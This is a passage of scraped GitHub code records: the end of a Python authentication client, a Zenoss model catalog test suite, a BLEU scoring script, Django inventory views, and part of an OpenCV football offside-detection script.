client1_id + HOST + PORT.__str__() + timestamp5.__str__()\r\n encodedMessage5 = message5.encode(\"utf-8\")\r\n\r\n # Application server public-key importation\r\n file_in = open('CCA_applicationServer_publicKey.pem', 'r')\r\n applicationServer_publicKey = RSA.import_key(file_in.read())\r\n\r\n RSA_cipher5 = PKCS1_OAEP.new(applicationServer_publicKey)\r\n encryptedMessageEncoded5 = RSA_cipher5.encrypt(encodedMessage5)\r\n applicationServer.sendall(encryptedMessageEncoded5)\r\n print('\\nSent ciphertext to application server: \"{}\" (Step 5)'.format(encryptedMessageEncoded5))\r\n\r\n # Client Registration; second reception and parsing of message content (6)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [Session Key||Session Lifetime||Client ID||Timestamp6]\r\n receivedData6 = applicationServer.recv(4096)\r\n print('\\nReceived ciphertext from application server: \"{}\" (Step 6)'.format(receivedData6))\r\n des_cipher6 = DES.new(client_tk.encode(\"utf-8\"), DES.MODE_ECB)\r\n receivedDataDecrypted6 = des_cipher6.decrypt(receivedData6)\r\n unpaddedReceivedDataDecrypted6 = unpad(receivedDataDecrypted6, BLOCK_SIZE)\r\n receivedDataDecryptedDecoded6 = unpaddedReceivedDataDecrypted6.decode(\"utf-8\")\r\n upperBoundSessionKeyExtract6 = receivedDataDecryptedDecoded6.find('86400')\r\n extractedSessionKey6 = receivedDataDecryptedDecoded6[0:upperBoundSessionKeyExtract6]\r\n print('\\nReceived session key from application server: \"{}\" (Step 6)'.format(extractedSessionKey6))\r\n\r\n # Service Request; construction and transmission of message content (7)\r\n # (Client -> Application Server)\r\n # Constructed message contents:\r\n # [req||Timestamp7]\r\n des_cipher7 = DES.new(extractedSessionKey6.encode(\"utf-8\"), DES.MODE_ECB)\r\n timestamp7 = time.time().__trunc__()\r\n message7 = req + timestamp7.__str__()\r\n encodedMessage7 = message7.encode(\"utf-8\")\r\n encodedMessage7Encrypted = des_cipher7.encrypt(pad(encodedMessage7, BLOCK_SIZE))\r\n applicationServer.sendall(encodedMessage7Encrypted)\r\n\r\n # Service Request; reception and parsing of message content (8)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [data||Timestamp8]\r\n receivedData8 = applicationServer.recv(4096)\r\n print('\\nReceived ciphertext from application server: \"{}\" (Step 8)'.format(receivedData8))\r\n des_cipher8 = DES.new(extractedSessionKey6.encode(\"utf-8\"), DES.MODE_ECB)\r\n receivedData8Decrypted = des_cipher8.decrypt(receivedData8)\r\n unpaddedReceivedData8Decrypted = unpad(receivedData8Decrypted, BLOCK_SIZE)\r\n receivedData8DecryptedDecoded = unpaddedReceivedData8Decrypted.decode(\"utf-8\")\r\n extractedTimestamp8 = receivedData8DecryptedDecoded[-10:]\r\n data = receivedData8DecryptedDecoded.replace(extractedTimestamp8, '')\r\n print('\\nReceived message from client: \"{}\" (Step 8)'.format(req))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"westbenj2020/PKI-Based-Authentication","sub_path":"client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17623854073","text":"import transaction\nimport unittest\n\nfrom Products.AdvancedQuery import Eq, MatchGlob, In\nfrom Products.ZenTestCase.BaseTestCase import BaseTestCase\nfrom Products.Zuul.catalog.interfaces import IModelCatalogTool\nfrom Products.Zuul.catalog.model_catalog import ModelCatalogDataManager, SearchParams, \\\n TX_SEPARATOR, TX_STATE_FIELD, MANDATORY_FIELDS\nfrom Products.Zuul.catalog.indexable import MODEL_INDEX_UID_FIELD as SOLR_UID\nfrom Products.Zuul.catalog.indexable import OBJECT_UID_FIELD as UID\n\nfrom Products.ZenModel.Device import manage_createDevice\n\nfrom zenoss.modelindex.model_index import SearchParams\n\n\nclass TestModelCatalogTransactions(BaseTestCase):\n\n def afterSetUp(self):\n super(TestModelCatalogTransactions, self).afterSetUp()\n # Lets change the ModelCatalogTestDataManager with ModelCatalogDataManager\n self.model_catalog = IModelCatalogTool(self.dmd)\n self.data_manager = ModelCatalogDataManager('localhost:8983', self.dmd)\n self.model_catalog.model_catalog_client._data_manager = self.data_manager\n # get a reference to model_index to be able to fo checks bypassing the data manager\n self.model_index = self.data_manager.model_index\n\n def beforeTearDown(self):\n # we dont need to put back the test data manager since each test creates its own\n pass\n\n def _get_transaction_state(self):\n tid = self.data_manager._get_tid()\n return self.data_manager._current_transactions.get(tid)\n\n def _check_tx_state(self, pending=None, temp_indexed=None, temp_deleted=None):\n tx_state = self._get_transaction_state()\n\n if pending and isinstance(pending, basestring):\n pending = [ pending ]\n if temp_indexed and isinstance(temp_indexed, basestring):\n temp_indexed = [ temp_indexed ]\n if temp_deleted and isinstance(temp_deleted, basestring):\n temp_deleted = [ temp_deleted ]\n\n if pending:\n for uid in pending:\n self.assertTrue(uid in tx_state.pending_updates)\n if temp_indexed:\n for uid in temp_indexed:\n self.assertTrue(uid in tx_state.temp_indexed_uids)\n self.assertFalse(uid in tx_state.temp_deleted_uids)\n if temp_deleted:\n for uid in temp_deleted:\n self.assertTrue(uid in tx_state.temp_deleted_uids)\n self.assertFalse(uid in tx_state.temp_indexed_uids)\n\n def _validate_temp_indexed_results(self, results, expected_object_uids):\n found_object_uids = set()\n for result in results:\n solr_uid = getattr(result, SOLR_UID)\n uid = getattr(result, UID)\n found_object_uids.add(uid)\n self.assertNotEquals(uid, solr_uid)\n self.assertTrue(uid in solr_uid)\n self.assertTrue(TX_SEPARATOR in solr_uid)\n self.assertIsNotNone(getattr(result, TX_STATE_FIELD))\n self.assertTrue(getattr(result, TX_STATE_FIELD) != 0)\n self.assertEquals(set(found_object_uids), set(expected_object_uids))\n\n def _simulate_tx_commit(self):\n tx = transaction.get()\n self.data_manager.tpc_begin(tx)\n self.data_manager.tpc_finish(tx)\n\n def testPartialUpdates(self):\n # for this test we need to create a test device and commit the changes to\n device = manage_createDevice(self.dmd, 'my_device', '/')\n ip = \"10.10.10.1\"\n prod_state = 500\n device_uid = device.idx_uid()\n device.setManageIp(ip)\n device.setProdState(prod_state)\n\n # get the uids we are about to commit so we can revert them at the end\n tx_state = self._get_transaction_state()\n tid = tx_state.tid\n updated_uids = set(tx_state.pending_updates.keys()) | tx_state.temp_indexed_uids\n try:\n # simulate the transaction was committed and do a few partial updates\n self._simulate_tx_commit()\n # make sure the device was correctly indexed\n fields = [\"productionState\", \"text_ipAddress\"]\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, ip)\n self.assertEquals(brain.productionState, prod_state)\n\n # update prod state triggers an atomic update\n new_prod_state = 1000\n device.setProdState(new_prod_state)\n # tx_state.pending_updates.values()[0].spec.to_dict()\n # mi_results = self.model_index.search(SearchParams(Eq(UID, device_uid)))\n # repeat the search and make sure that the atomic update has all the fields it should\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=True)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, ip)\n self.assertEquals(brain.productionState, new_prod_state)\n # Make sure the index update is correct\n tx_state = self._get_transaction_state()\n index_update = tx_state.indexed_updates.get(device_uid)\n self.assertIsNotNone(index_update)\n expected_fields = MANDATORY_FIELDS | set( [ \"productionState\" ] )\n self.assertEquals(expected_fields, index_update.idxs)\n\n # Set manage ip also sends a partial update for fields \n # 'decimal_ipAddress', 'text_ipAddress'\n new_ip = \"10.10.10.2\"\n device.setManageIp(new_ip)\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=True)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, new_prod_state)\n # Make sure the partial updates have been correctly combined\n tx_state = self._get_transaction_state()\n index_update = tx_state.indexed_updates.get(device_uid)\n self.assertIsNotNone(index_update)\n expected_fields = MANDATORY_FIELDS | set([ 'decimal_ipAddress', 'text_ipAddress', \"productionState\" ])\n self.assertEquals(expected_fields, index_update.idxs)\n\n # simulate another transaction commit and check everything went well\n self._simulate_tx_commit()\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, new_prod_state)\n\n # make sure all temp documents have beed deleted\n search_results = self.model_catalog.search(query=Eq(TX_STATE_FIELD, tid), commit_dirty=False)\n self.assertEquals(search_results.total, 0)\n finally:\n query = In(UID, updated_uids)\n self.model_index.unindex_search(SearchParams(query))\n\n\n def testMultipleUpdates(self):\n device = manage_createDevice(self.dmd, 'my_device', '/')\n device_uid = device.idx_uid()\n # On creationg, a index update of the whole object should have been created\n tx_state = self._get_transaction_state()\n self._check_tx_state(pending=device_uid)\n # temporary commit changes made so far\n self.data_manager.do_mid_transaction_commit()\n # We should be able to find the newly created device\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n # Changing the managed ip should trigger another index update\n ip = \"10.10.10.1\"\n device.setManageIp(ip)\n self.assertTrue(device_uid in tx_state.pending_updates)\n self.assertTrue(device_uid in tx_state.temp_indexed_uids)\n\n # a serch by ip \"10.10.10.1\" should return our device\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n\n # set the managed ip to a different value\n old_ip = ip\n new_ip = \"10.10.10.2\"\n device.setManageIp(new_ip)\n # search by new ip should return out device\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", new_ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n # search by old ip should NOT return anything\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", old_ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[])\n\n # set production state\n prod_state = 1100\n device.setProdState(prod_state)\n search_results = self.model_catalog.search(query=Eq(\"productionState\", prod_state), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n\n # Search by uid and check all the fields are correct\n fields = [\"productionState\", \"text_ipAddress\"]\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, prod_state)\n\n def testDataManager(self):\n # before any changes are made, tx_state is None\n self.assertIsNone(self._get_transaction_state())\n device_class_1 = \"device_class_1\"\n device_class_2 = \"device_class_2\"\n device_class_3 = \"device_class_3\"\n device_class_4 = \"device_class_4\"\n\n # create an organizer\n dc_1 = self.dmd.Devices.createOrganizer(device_class_1)\n tx_state = self._get_transaction_state()\n dc_1_uid = dc_1.idx_uid()\n\n # Some tx_state checks\n self.assertIsNotNone(tx_state)\n self.assertTrue( len(tx_state.pending_updates) > 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 0 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 0 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n\n # The new organizer index update should have been buffered in tx_state\n self._check_tx_state(pending=dc_1_uid)\n\n # A search with commit_dirty=False should not find the new device organizer\n search_results = self.model_catalog.search(query=Eq(UID, dc_1_uid), commit_dirty=False)\n self.assertEquals( search_results.total, 0 )\n\n # A search with commit_dirty=True must find the new device organizer\n search_results = self.model_catalog.search(query=Eq(UID, dc_1_uid), commit_dirty=True)\n # model catalog should return the dirty doc\n self.assertEquals( search_results.total, 1 )\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid])\n\n # the tx_state object should have been updated appropiately\n self._check_tx_state(temp_indexed=dc_1_uid)\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n \n # create another organizer\n dc_2 = self.dmd.Devices.createOrganizer(device_class_2)\n dc_2_uid = dc_2.idx_uid()\n\n # check tx_state has been updated accordinly\n self._check_tx_state(pending=dc_2_uid, temp_indexed=dc_1_uid)\n\n # search for both device classes with commit_dirty=False, it should only return dc_1_uid\n query = MatchGlob(UID, \"/zport/dmd/Devices/device_class*\")\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid])\n # tx_state should not have changed\n self._check_tx_state(pending=dc_2_uid, temp_indexed=dc_1_uid)\n\n # now with commit_dirty=True\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self._check_tx_state(temp_indexed=[dc_1_uid, dc_2_uid])\n # it should return 2 device classes\n self.assertEquals( search_results.total, 2 )\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid, dc_2_uid])\n\n # Lets delete device_class_1\n self.dmd.Devices._delObject(device_class_1)\n self._check_tx_state(pending=[dc_1_uid])\n # a search with commit = True should not return device_class_1 anymore\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_2_uid])\n self._check_tx_state(temp_deleted=[dc_1_uid])\n # however, we should have two temp docs matching \"/zport/dmd/Devices/device_class*\"\n mi_results = self.model_index.search(SearchParams(query))\n self.assertTrue( mi_results.total_count == 2 )\n # make sure a count type of query works (search with limit=0)\n search_results = self.model_catalog.search(query=query, limit=0, commit_dirty=True)\n self.assertTrue( search_results.total == 1 )\n\n # some more tx_state checks before moving on to the next thing\n tx_state = self._get_transaction_state()\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 2 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 1 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 1 )\n\n # Simulate transaction is committed and do checks\n updated_uids = set(tx_state.pending_updates.keys()) | tx_state.temp_indexed_uids\n try:\n tid = self.data_manager._get_tid()\n # before commit we should have 2 docs with tx_state = tid\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertTrue( mi_results.total_count == 2 )\n # Lets do the commit\n self._simulate_tx_commit()\n self.assertIsNone(self._get_transaction_state())\n # Check we only have one doc matching \"/zport/dmd/Devices/device_class*\"\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self.assertEquals( search_results.total, 1 )\n # Check the result's tx_state field has been set to zero\n brain = search_results.results.next()\n self.assertEquals( brain.tx_state, 0 )\n # No documents should remain with tx_state == tid\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertEquals( mi_results.total_count, 0 )\n finally:\n # clean up created docs in solr\n query = In(UID, updated_uids)\n self.model_index.unindex_search(SearchParams(query))\n\n # create another organizer in a new transaction\n dc_3 = self.dmd.Devices.createOrganizer(device_class_3)\n dc_3_uid = dc_3.idx_uid()\n self._check_tx_state(pending=dc_3_uid)\n tx_state = self._get_transaction_state()\n self.assertTrue( len(tx_state.pending_updates) == 1 )\n self.assertTrue( len(tx_state.indexed_updates) == 0 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 0 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n # Manual mid-transaction commit\n self.data_manager.do_mid_transaction_commit()\n self._check_tx_state(temp_indexed=dc_3_uid)\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 1 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 1 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n query = MatchGlob(UID, \"/zport/dmd/Devices/device_class*\")\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_3_uid])\n # Simulate transaction is aborted and check tx state has been reset\n self.data_manager.abort(transaction.get())\n # No docs should match the device class uid\n search_results = self.model_catalog.search(query=Eq(UID, dc_3_uid), commit_dirty=False)\n self.assertTrue(search_results.total == 0)\n # No documents should remain with tx_state == tid\n tid = self.data_manager._get_tid()\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertEquals( mi_results.total_count, 0 )\n self.assertIsNone(self._get_transaction_state())\n\n # delete a doc that exists before current tx, do a search with commit dirty and abort\n dc_4 = self.dmd.Devices.createOrganizer(device_class_4)\n dc_4_uid = dc_4.idx_uid()\n query = Eq(UID, dc_4_uid)\n try:\n self._simulate_tx_commit() # commit to get the device_class_4 doc in solr\n # check the doc exists in solr\n search_results = self.model_catalog.search(query=query)\n self.assertTrue(search_results.total == 1)\n # delete the object\n self.dmd.Devices._delObject(device_class_4)\n # a model catalog search with commit_dirty=True should no return the deleted doc\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self.assertTrue(search_results.total == 0)\n # however the doc is still in solr\n mi_results = self.model_index.search(SearchParams(query))\n self.assertTrue( mi_results.total_count == 1 )\n # Abort tx\n self.data_manager.abort(transaction.get())\n # The doc should have been left intact in solr\n search_results = self.model_catalog.search(query=query)\n self.assertTrue(search_results.total == 1)\n finally:\n # clean up created docs in solr\n self.model_index.unindex_search(SearchParams(query)) \n\n def testSearchBrain(self):\n # create an object\n device_class_1 = \"device_class_1\"\n dc_1 = self.dmd.Devices.createOrganizer(device_class_1)\n dc_1_uid = dc_1.idx_uid()\n search_results = self.data_manager.search_brain(uid=dc_1_uid, context=self.dmd, commit_dirty=False)\n self.assertTrue( search_results.total == 0 )\n search_results = self.data_manager.search_brain(uid=dc_1_uid, context=self.dmd, commit_dirty=True)\n self.assertTrue( search_results.total == 1 )\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid])\n\n def testSearches(self):\n n_organizers = 100\n organizers = {}\n pattern = \"testSearches_DEVICE_CLASS_\"\n for i in xrange(n_organizers):\n dc = self.dmd.Devices.createOrganizer(\"{}{:02}\".format(pattern, i))\n organizers[dc.idx_uid()] = dc\n query = MatchGlob(UID, \"/zport/dmd/Devices/{}*\".format(pattern))\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self.assertTrue( search_results.total == 0 )\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self.assertTrue( search_results.total == n_organizers )\n search_results = self.model_catalog.search(query=query, limit=0)\n self.assertTrue( search_results.total == n_organizers )\n limit = 18\n for start in [ 0, 12, 45, 70 ]:\n expected_uids = { \"/zport/dmd/Devices/{}{:02}\".format(pattern, i) for i in xrange(start, start+limit) }\n search_results = self.model_catalog.search(query=query, start=start, limit=limit)\n self.assertTrue( search_results.total == n_organizers )\n brain_uids = { getattr(brain, UID) for brain in search_results.results }\n self.assertEquals( len(brain_uids), limit )\n self.assertEquals( len(brain_uids), len(expected_uids) )\n self.assertTrue( len( expected_uids - brain_uids ) == 0 )\n self.assertTrue( len( brain_uids - expected_uids ) == 0 )\n\n\ndef test_suite():\n return unittest.TestSuite((unittest.makeSuite(TestModelCatalogTransactions),))\n\n\nif __name__==\"__main__\":\n unittest.main(defaultTest='test_suite')\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/catalog/tests/testModelCatalogTransactions.py","file_name":"testModelCatalogTransactions.py","file_ext":"py","file_size_in_byte":20995,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"31542589268","text":"import pandas as pd\nimport evaluate\n\ndef bleu():\n import pandas as pd\n bleu = evaluate.load(\"bleu\")\n df = pd.read_csv(\"chitchat/emp_data_out.csv\")\n bot_out = []\n out = []\n for index, row in df.iterrows():\n if not pd.isnull(row['bot_out']) and not pd.isnull(row['recv']):\n out.append(row['recv'].strip())\n bot_out.append(row['bot_out'].strip())\n results = bleu.compute(predictions=bot_out,references=out)\n print(results)\n\nbleu()","repo_name":"ankitshaw/CSE635_NLP_Project","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30324820888","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom main.forms import ItemForm, Item\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages \nfrom django.contrib.auth import authenticate, login \nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponseNotFound\nfrom django.http import JsonResponse\nimport json\nfrom django.contrib.auth import logout as auth_logout\n\n# Create your views here.\n\n# def show_item()\n@login_required(login_url='/login')\ndef show_main(request):\n items = Item.objects.filter(user = request.user)\n context = {\n 'name': request.user.username, \n 'items': items,\n 'last_login': request.COOKIES['last_login'],\n 'pembuat' : 'Tsabit Coda R - PBP C'\n }\n\n return render(request, \"main.html\", context)\n\ndef create_Item(request):\n # message = ''\n form = ItemForm(request.POST or None)\n\n if form.is_valid() and request.method == \"POST\":\n item = form.save(commit=False)\n item.user = request.user\n item.save()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n context = {'form': form}\n return render(request, \"create_Item.html\", context)\n\ndef show_xml(request):\n data = Item.objects.all()\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n\ndef show_json(request):\n data = Item.objects.all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_json_by_id(request,id):\n data = Item.objects.filter(pk=id)\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_xml_by_id(request,id):\n data = Item.objects.filter(pk=id)\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n\ndef register(request):\n form = UserCreationForm()\n\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Welcome Gamers! Your account has been successfully created!')\n return redirect('main:login')\n context = {'form':form}\n return render(request, 'register.html', context)\n\ndef login_user(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request,user)\n response = HttpResponseRedirect(reverse(\"main:show_main\"))\n response.set_cookie('last_login', str(datetime.date.today()))\n return response\n else:\n messages.info(request, 'Sorry, incorrect username or password. Please try again.')\n context = {}\n return render(request, 'login.html', context)\n\n\ndef logout_user(request):\n logout(request)\n response = HttpResponseRedirect(reverse('main:login'))\n response.delete_cookie('last_login')\n return response\n\n@csrf_exempt\ndef kurang_amount(request,id):\n barang_check = Item.objects.get(pk=id)\n if barang_check.amount > 1:\n barang_check.amount -= 1\n barang_check.save()\n else:\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef tambah_amount(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.amount += 1\n barang_check.save()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef hapus_item(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\ndef get_product_json(request):\n data = Item.objects.filter(user = request.user)\n return HttpResponse(serializers.serialize('json', data))\n\n@csrf_exempt\ndef add_product_ajax(request):\n if request.method == 'POST':\n name = request.POST.get(\"name\")\n price = request.POST.get(\"price\")\n description = request.POST.get(\"description\")\n amount = request.POST.get(\"amount\")\n user = request.user\n\n new_product = Item(name=name, price=price, description=description,amount=amount, user=user)\n new_product.save()\n\n return HttpResponse(b\"CREATED\", status=201)\n\n return HttpResponseNotFound()\n\n@csrf_exempt\ndef kurang_amount_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n if barang_check.amount > 1:\n barang_check.amount -= 1\n barang_check.save()\n return HttpResponse(b\"CREATED\", status=201)\n else:\n barang_check.delete()\n # return HttpResponseRedirect(reverse('main:show_main'))\n return HttpResponse(b\"NOT CREATED\", status=201)\n\n@csrf_exempt\ndef tambah_amount_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.amount += 1\n barang_check.save()\n # return HttpResponseRedirect(reverse('main:show_main'))\n return HttpResponse(b\"ADD\", status=201)\n\n@csrf_exempt\ndef hapus_item_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef create_product_flutter(request):\n if request.method == 'POST':\n \n data = json.loads(request.body)\n\n new_product = Item.objects.create(\n user = request.user,\n name = data[\"name\"],\n price = int(data[\"price\"]),\n amount = int(data[\"amount\"]),\n description = data[\"description\"],\n # date_added = data([\"date_added\"])\n )\n\n new_product.save()\n\n return JsonResponse({\"status\": \"success\"}, status=200)\n else:\n return JsonResponse({\"status\": \"error\"}, status=401)\n \n","repo_name":"codaaa19/TugasKeduaPBP","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11936163673","text":"# USAGE\n# To detect offside in a pre-recorded video, type the following in terminal:\n# python Offside_detection.py -v 'name of video file'\n#\n# To detect offside from live camera feed:\n# python Offside_detection.py\n#\n# while running the program, press 'i' to input and 'q' to quit\n\nimport cv2\nimport numpy as np\nimport track_utils\nfrom collections import deque\nimport math\n\nframe = None\norig_frame = None\nroi_hist_A, roi_hist_B = None, None\nroi = None\n\nteam = None\n\n\nteamA = np.array([])\nteamB = np.array([])\nteamB_new = np.array([])\nteamA_new = np.array([])\npts = []\n\nminDist = 0\nprevTeam = None\nprevPasser = -1\n\nM = None\nop = None\nlimits = None\nball_center = None\n\nkernel = np.array([[0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1],\n [0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 0, 0]], dtype=np.uint8)\n\nprevgrad = 0\npasses = 0\n\nvel, prev_vel = 0, 0\n\npts_ball = deque()\n\n\ndef trackBall():\n\n global grad, prevgrad, passes, ball_center, pts_ball, frame, vel, prev_vel, prevPasser, prevTeam, minDist\n pts_ball.appendleft(ball_center)\n\n if len(pts_ball) > 2:\n if len(pts_ball) > 20:\n\n for i in xrange(1, 20):\n cv2.line(frame, pts_ball[i - 1], pts_ball[i], (0, 0, 255), 2, cv2.LINE_AA)\n else:\n for i in xrange(1, len(pts_ball)):\n cv2.line(frame, pts_ball[i - 1], pts_ball[i], (0, 0, 255), 2, cv2.LINE_AA)\n\n\n l = len(pts_ball)\n if l >= 10:\n grad = np.arctan2((pts_ball[9][1] - pts_ball[0][1]), (pts_ball[9][0] - pts_ball[0][0]))\n grad = grad * (180.0 / np.pi)\n grad %= 360\n\n vel = math.sqrt((pts_ball[9][1] - pts_ball[0][1]) ** 2 + (pts_ball[9][0] - pts_ball[0][0]) ** 2) / 10\n if (math.fabs(grad - prevgrad) >= 20):\n # or math.fabs(vel-prev_vel) >= 7:\n # detectPlayers()\n # print(\"a \" + str(len(teamA)) + \" b \" + str(len(teamB)))\n if len(teamA) != 0 and len(teamB) != 0:\n getCoordinates()\n detectPasser()\n\n # print(passerIndex)\n\n if ((prevTeam != team) or (passerIndex != prevPasser)) and minDist < 10000:\n # print(minDist)\n # print(str(team) + str(passerIndex))\n if (team == 'A'):\n\n detectOffside()\n else:\n print('Not offside')\n\n passes += 1\n #print('Ball Passed ' + str(passes))\n prevPasser = passerIndex\n prevTeam = team\n\n\n prevgrad = grad\n prev_vel = vel\n\n\n\ndef detectPlayers():\n global frame, roi_hist_A, roi_hist_B, teamA, teamB\n teamA = []\n teamB = []\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n cnt_thresh = 180\n if roi_hist_A is not None:\n backProjA = cv2.calcBackProject([hsv], [0, 1], roi_hist_A, [0, 180, 0, 256], 1)\n maskA = track_utils.applyMorphTransforms2(backProjA)\n #cv2.imshow('mask a', maskA)\n\n cnts = cv2.findContours(maskA.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n if len(cnts) > 0:\n c = sorted(cnts, key=cv2.contourArea, reverse=True)\n for i in range(len(c)):\n if cv2.contourArea(c[i]) < cnt_thresh:\n break\n\n x, y, w, h = cv2.boundingRect(c[i])\n h += 5\n y -= 5\n if h < 0.8 * w:\n continue\n elif h / float(w) > 3:\n continue\n\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n M = cv2.moments(c[i])\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n foot = (center[0], int(center[1] + h * 1.5))\n teamA.append(foot)\n cv2.circle(frame, foot, 5, (0, 0, 255), -1)\n if roi_hist_B is not None:\n backProjB = cv2.calcBackProject([hsv], [0, 1], roi_hist_B, [0, 180, 0, 256], 1)\n maskB = track_utils.applyMorphTransforms2(backProjB)\n #cv2.imshow('mask b', maskB)\n\n cnts = cv2.findContours(maskB.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n if len(cnts) > 0:\n c = sorted(cnts, key=cv2.contourArea, reverse=True)\n for i in range(len(c)):\n if cv2.contourArea(c[i]) < 